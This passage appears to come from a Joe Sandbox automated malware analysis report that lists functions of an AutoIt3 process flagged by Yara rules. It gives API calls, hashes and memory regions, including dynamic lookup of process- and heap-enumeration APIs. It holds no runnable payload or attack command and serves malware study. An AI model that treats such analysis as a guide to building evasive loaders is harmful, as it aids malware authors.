                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __lock_file_memset
                                      • String ID:
                                      • API String ID: 26237723-0
                                      • Opcode ID: 79acc3896efa999176387c248a3e3da82d251e12f8669802e5d3e4076457a67d
                                      • Instruction ID: 6eba18eb69c747de671a58e699c33c3c489f0705c992b8ada014abaacb5a8b0b
                                      • Opcode Fuzzy Hash: 79acc3896efa999176387c248a3e3da82d251e12f8669802e5d3e4076457a67d
                                      • Instruction Fuzzy Hash: 76018471C41A29EBCF11AF6DAC0189F7B61FF80360F144125B824EB1A1DB758AA1DF92
                                      Function 008255C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00828D58: __getptd_noexit.LIBCMT ref: 00828D58
                                      • __lock_file.LIBCMT ref: 0082560B
                                        • Part of subcall function 00826E3E: __lock.LIBCMT ref: 00826E61
                                      • __fclose_nolock.LIBCMT ref: 00825616
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                      • String ID:
                                      • API String ID: 2800547568-0
                                      • Opcode ID: 82e580667f8853eb41fa16d9f506ed90c03a14ac2f3e6d76519521243de3fa98
                                      • Instruction ID: 03099f358fff9b44d4314b38b5e41ecd0184bd03fb2ad172be1c197f2c47df5a
                                      • Opcode Fuzzy Hash: 82e580667f8853eb41fa16d9f506ed90c03a14ac2f3e6d76519521243de3fa98
                                      • Instruction Fuzzy Hash: 63F09071842B25EBDB116B6DA90276E67E1FF51334F218209A428EB1C1CB7C49C19B52
                                      Function 00825E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • __lock_file.LIBCMT ref: 00825EB4
                                      • __ftell_nolock.LIBCMT ref: 00825EBF
                                        • Part of subcall function 00828D58: __getptd_noexit.LIBCMT ref: 00828D58
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                      • String ID:
                                      • API String ID: 2999321469-0
                                      • Opcode ID: 652f813dafcaa42618e934dab4456eae14e1a2f34135332bfdaa7d8f96ee829d
                                      • Instruction ID: ca7d774d47532ef7899b61b021c4363f2c3e6be07c1abd1389c0c0ddb9dba301
                                      • Opcode Fuzzy Hash: 652f813dafcaa42618e934dab4456eae14e1a2f34135332bfdaa7d8f96ee829d
                                      • Instruction Fuzzy Hash: CDF082759526359ADB00BB6CA90376E7690FF11331F624205A020EB1C2CF784A819A56
                                      Function 03CC15C8 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000001,?,?,?,03CC195B), ref: 03CC15F7
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,03CC195B), ref: 03CC161E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: a16a4071967251907a58352cacd20368cc2259d429a1e3d20d1b858e4c65edba
                                      • Instruction ID: 4e07578e8f388aae94725d538720bed7fee1508992a3509736ea116df3b54dbb
                                      • Opcode Fuzzy Hash: a16a4071967251907a58352cacd20368cc2259d429a1e3d20d1b858e4c65edba
                                      • Instruction Fuzzy Hash: 18F0AE76F2077017D720E66B4C80F565589DF45794F1D01B5F94CEF3CAD6618C019294
                                      Function 011CFBBD Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,011CFF50), ref: 011CFBEC
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,011CFF50), ref: 011CFC13
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 03457142e48081e7e8e57ad920f5f623081f965a685a9453fd24243ed60eceb8
                                      • Instruction ID: b1e00eed13521c721625da7e9bd1d915f91479078eaec12a5b9cba0142545391
                                      • Opcode Fuzzy Hash: 03457142e48081e7e8e57ad920f5f623081f965a685a9453fd24243ed60eceb8
                                      • Instruction Fuzzy Hash: 0AF02E72B0062327EF25596D4C80F9359969F65F54F154074FA48FF3CDD7514C0242A2
                                      Function 0081343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: f4699ce73407f7e6fd3687af13ccdbd9752f29efe32c18429d5fbff781bcfb53
                                      • Instruction ID: c21d62cf4e48b90060978a990a2471b13dbdf9f00dcecc09549487d3b5a12e5c
                                      • Opcode Fuzzy Hash: f4699ce73407f7e6fd3687af13ccdbd9752f29efe32c18429d5fbff781bcfb53
                                      • Instruction Fuzzy Hash: F331D079204A16EFD724DF18D080AA1F7A8FF18310B54C569E88ACB791DB30ECC1CB98
                                      Function 00820E38 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: EnumWindows
                                      • String ID:
                                      • API String ID: 1129996299-0
                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction ID: e212778c842dc8e9747a5673df3247dd7e7e7983028b10d479db4f026e6af61e
                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction Fuzzy Hash: E33104B8A00119DFC718DF48E480969F7A6FF59310B658AA5E409CB262EB31EDC1CF90
                                      Function 0083E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 50276330fbcbafc95e58a9c451b0689f70445a4841c39bb6e2e2ea161b274127
                                      • Instruction ID: 8ca3fbd0777c8372a61f253627ce1f794ba52b0f0a3b2f4e62b7c28fb543e329
                                      • Opcode Fuzzy Hash: 50276330fbcbafc95e58a9c451b0689f70445a4841c39bb6e2e2ea161b274127
                                      • Instruction Fuzzy Hash: 9C412974504351DFDB64DF18C844B1ABBE1FF84308F1988ACE8899B3A2D371E895CB92
                                      Function 008149C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00814B29: FreeLibrary.KERNEL32(00000000,?), ref: 00814B63
                                        • Part of subcall function 0082547B: __wfsopen.LIBCMT ref: 00825486
                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,008127AF,?,00000001), ref: 008149F4
                                        • Part of subcall function 00814ADE: FreeLibrary.KERNEL32(00000000), ref: 00814B18
                                        • Part of subcall function 008148B0: _memmove.LIBCMT ref: 008148FA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Library$Free$Load__wfsopen_memmove
                                      • String ID:
                                      • API String ID: 1396898556-0
                                      • Opcode ID: 68d00873809a86b75da363678ae2c20dac604911f300a466fa22a5a0137f856c
                                      • Instruction ID: 3c2f7767b5087e833397b8df695ed52478d730ad0956dc897f36ff19346b3df1
                                      • Opcode Fuzzy Hash: 68d00873809a86b75da363678ae2c20dac604911f300a466fa22a5a0137f856c
                                      • Instruction Fuzzy Hash: D3112732650219ABCB10FB78CC02FEE77ADFF40711F108429F545E61C1EB719A84AB96
                                      Function 0083E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 651816802ff46c58bec8edf7bebcf9791807305af05deee12c155c6a798f4e66
                                      • Instruction ID: c89e9dd5895700d55ca5d78b5e9d513b88c111701251e12ccfaa35266569e5b1
                                      • Opcode Fuzzy Hash: 651816802ff46c58bec8edf7bebcf9791807305af05deee12c155c6a798f4e66
                                      • Instruction Fuzzy Hash: A72113B4508755DFDB54DF14C844B1ABBE4FF88304F094968F88A973A2D731E869CB92
                                      Function 03CF5200 Relevance: 1.6, APIs: 1, Instructions: 57registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,?,00000100,?,00000000,00000000,00020119,?), ref: 03CF5292
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 19e1dc115acc8fabefa7451324c292d227cc4c774d14a0dc89b481fe50c12d91
                                      • Instruction ID: 882017256a9ca970430eb1872f2239c568143fbb3f0cff656d4ea0fba8174312
                                      • Opcode Fuzzy Hash: 19e1dc115acc8fabefa7451324c292d227cc4c774d14a0dc89b481fe50c12d91
                                      • Instruction Fuzzy Hash: A311527AE1025C6BCB15EAD5CC81EEEB3BCAF48311F0545AAEB14DB240D6709A449BA0
                                      Function 011D34C9 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringA.USER32(00000000,00010000,?,00001000), ref: 011D34FB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LoadString
                                      • String ID:
                                      • API String ID: 2948472770-0
                                      • Opcode ID: 5cf62204559087ab60950614ec390625303e3f9792decb59be4d88d8f3b843f4
                                      • Instruction ID: 856806ccbc4eff0edc37bb0fe3f785ded9791525a9f85efe6baf1b396ec6cd62
                                      • Opcode Fuzzy Hash: 5cf62204559087ab60950614ec390625303e3f9792decb59be4d88d8f3b843f4
                                      • Instruction Fuzzy Hash: 36F0A0B17001129BCB09DA9CCCC0F8673DC5F1C248B448061B518CB348EB70CC4087A2
                                      Function 00814A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _fseek
                                      • String ID:
                                      • API String ID: 2937370855-0
                                      • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                      • Instruction ID: a26c98ad9fc1add42c6eddb743613e8dfc06ced07fefc45620ef31aea87747b2
                                      • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                      • Instruction Fuzzy Hash: B3F085B6400218BFDF108F85EC00CEBBF7DFF89324F104198F9049A210D272EA618BA0
                                      Function 00814A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,?,008127AF,?,00000001), ref: 00814A63
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 9898b7b15a0061ccc533bafdd3fef6128508d7783733cff3645151f605fca0a0
                                      • Instruction ID: 848aeab49c66527d83f30557ef30843e25a1559223140e8081313512a9676d16
                                      • Opcode Fuzzy Hash: 9898b7b15a0061ccc533bafdd3fef6128508d7783733cff3645151f605fca0a0
                                      • Instruction Fuzzy Hash: F4F0F271185721CFCB349F64E4A4896BBF9FF1432A329A92EE1E6C2610C7319984DB44
                                      Function 00814AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __fread_nolock
                                      • String ID:
                                      • API String ID: 2638373210-0
                                      • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                      • Instruction ID: 79f824e42ff38cb356cadced68eef0bc15b8c5403ef6cc64e6792a875b03ef30
                                      • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                      • Instruction Fuzzy Hash: AFF0F87640020DFFDF05CF94C941EAABB79FF14314F208589FD198A252D376DA61AB91
                                      Function 03CC5990 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00800000,?,00000105), ref: 03CC59AE
                                        • Part of subcall function 03CC5C24: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 03CC5C3F
                                        • Part of subcall function 03CC5C24: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03CC5C5D
                                        • Part of subcall function 03CC5C24: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03CC5C7B
                                        • Part of subcall function 03CC5C24: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 03CC5C99
                                        • Part of subcall function 03CC5C24: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,03CC5D28,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03CC5CE2
                                        • Part of subcall function 03CC5C24: RegQueryValueExA.ADVAPI32(?,03CC5EA4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,03CC5D28,?,80000001), ref: 03CC5D00
                                        • Part of subcall function 03CC5C24: RegCloseKey.ADVAPI32(?,03CC5D2F,00000000,00000000,00000005,00000000,03CC5D28,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03CC5D22
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Open$FileModuleNameQueryValue$Close
                                      • String ID:
                                      • API String ID: 2796650324-0
                                      • Opcode ID: 5f0301a89e09c4e581c626b153b1e41430e2d8e776082f7fb6fe3419c70388bb
                                      • Instruction ID: 2a462aaddd47a2a51f94a4c6ca1b7a4d80cbfd72967db63dcfd2792e98f1eb81
                                      • Opcode Fuzzy Hash: 5f0301a89e09c4e581c626b153b1e41430e2d8e776082f7fb6fe3419c70388bb
                                      • Instruction Fuzzy Hash: 4DE09275A103508FCB10DE5DC8C0A4273D8AF09760F440995EC54CF346D370EE2087D0
                                      Function 011D2E7D Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00800000,?,00000105), ref: 011D2E9B
                                        • Part of subcall function 011D3111: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 011D312C
                                        • Part of subcall function 011D3111: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 011D314A
                                        • Part of subcall function 011D3111: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 011D3168
                                        • Part of subcall function 011D3111: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 011D3186
                                        • Part of subcall function 011D3111: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,011D3215,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 011D31CF
                                        • Part of subcall function 011D3111: RegQueryValueExA.ADVAPI32(?,011D3391,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,011D3215,?,80000001), ref: 011D31ED
                                        • Part of subcall function 011D3111: RegCloseKey.ADVAPI32(?,011D321C,00000000,00000000,00000005,00000000,011D3215,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 011D320F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Open$FileModuleNameQueryValue$Close
                                      • String ID:
                                      • API String ID: 2796650324-0
                                      • Opcode ID: b71db44c6d7a6867040f1260aada16823b63df32703d9526eeae95d1c3033a29
                                      • Instruction ID: 6523e21957be72576b1901bf3da09e2425f6bc4fa9fbf60be7bd7c988fa22005
                                      • Opcode Fuzzy Hash: b71db44c6d7a6867040f1260aada16823b63df32703d9526eeae95d1c3033a29
                                      • Instruction Fuzzy Hash: F4E01272A003259FCB14DE6CC8C1A8777D8AF18754F444565ED64DF346D371D95087E1
                                      Function 008209C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008209E4
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LongNamePath_memmove
                                      • String ID:
                                      • API String ID: 2514874351-0
                                      • Opcode ID: 6e91897a4ccdde10742a8eea81a260f9f582ac42c890b3abb9d1dc3f5bd27ee9
                                      • Instruction ID: cb9cc55af13c383b7e9e790c6875b1ea6f60919c4bee3a4b7cc4257df40e2be6
                                      • Opcode Fuzzy Hash: 6e91897a4ccdde10742a8eea81a260f9f582ac42c890b3abb9d1dc3f5bd27ee9
                                      • Instruction Fuzzy Hash: D1E086369001285BCB21A6AC9C09FEAB7DDEF896A1F0441B6FD0CD7304D9609C8186D1
                                      Function 03CDB110 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 03CDAE54: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,03CDB0DB,00000000,?,03CEB350,00000000,03CEB636,?,?,?,?,00000000,00000000), ref: 03CDAE68
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 03CDAE80
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 03CDAE92
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 03CDAEA4
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 03CDAEB6
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 03CDAEC8
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 03CDAEDA
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32First), ref: 03CDAEEC
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 03CDAEFE
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 03CDAF10
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 03CDAF22
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 03CDAF34
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 03CDAF46
                                        • Part of subcall function 03CDAE54: GetProcAddress.KERNEL32(00000000,Module32First), ref: 03CDAF58
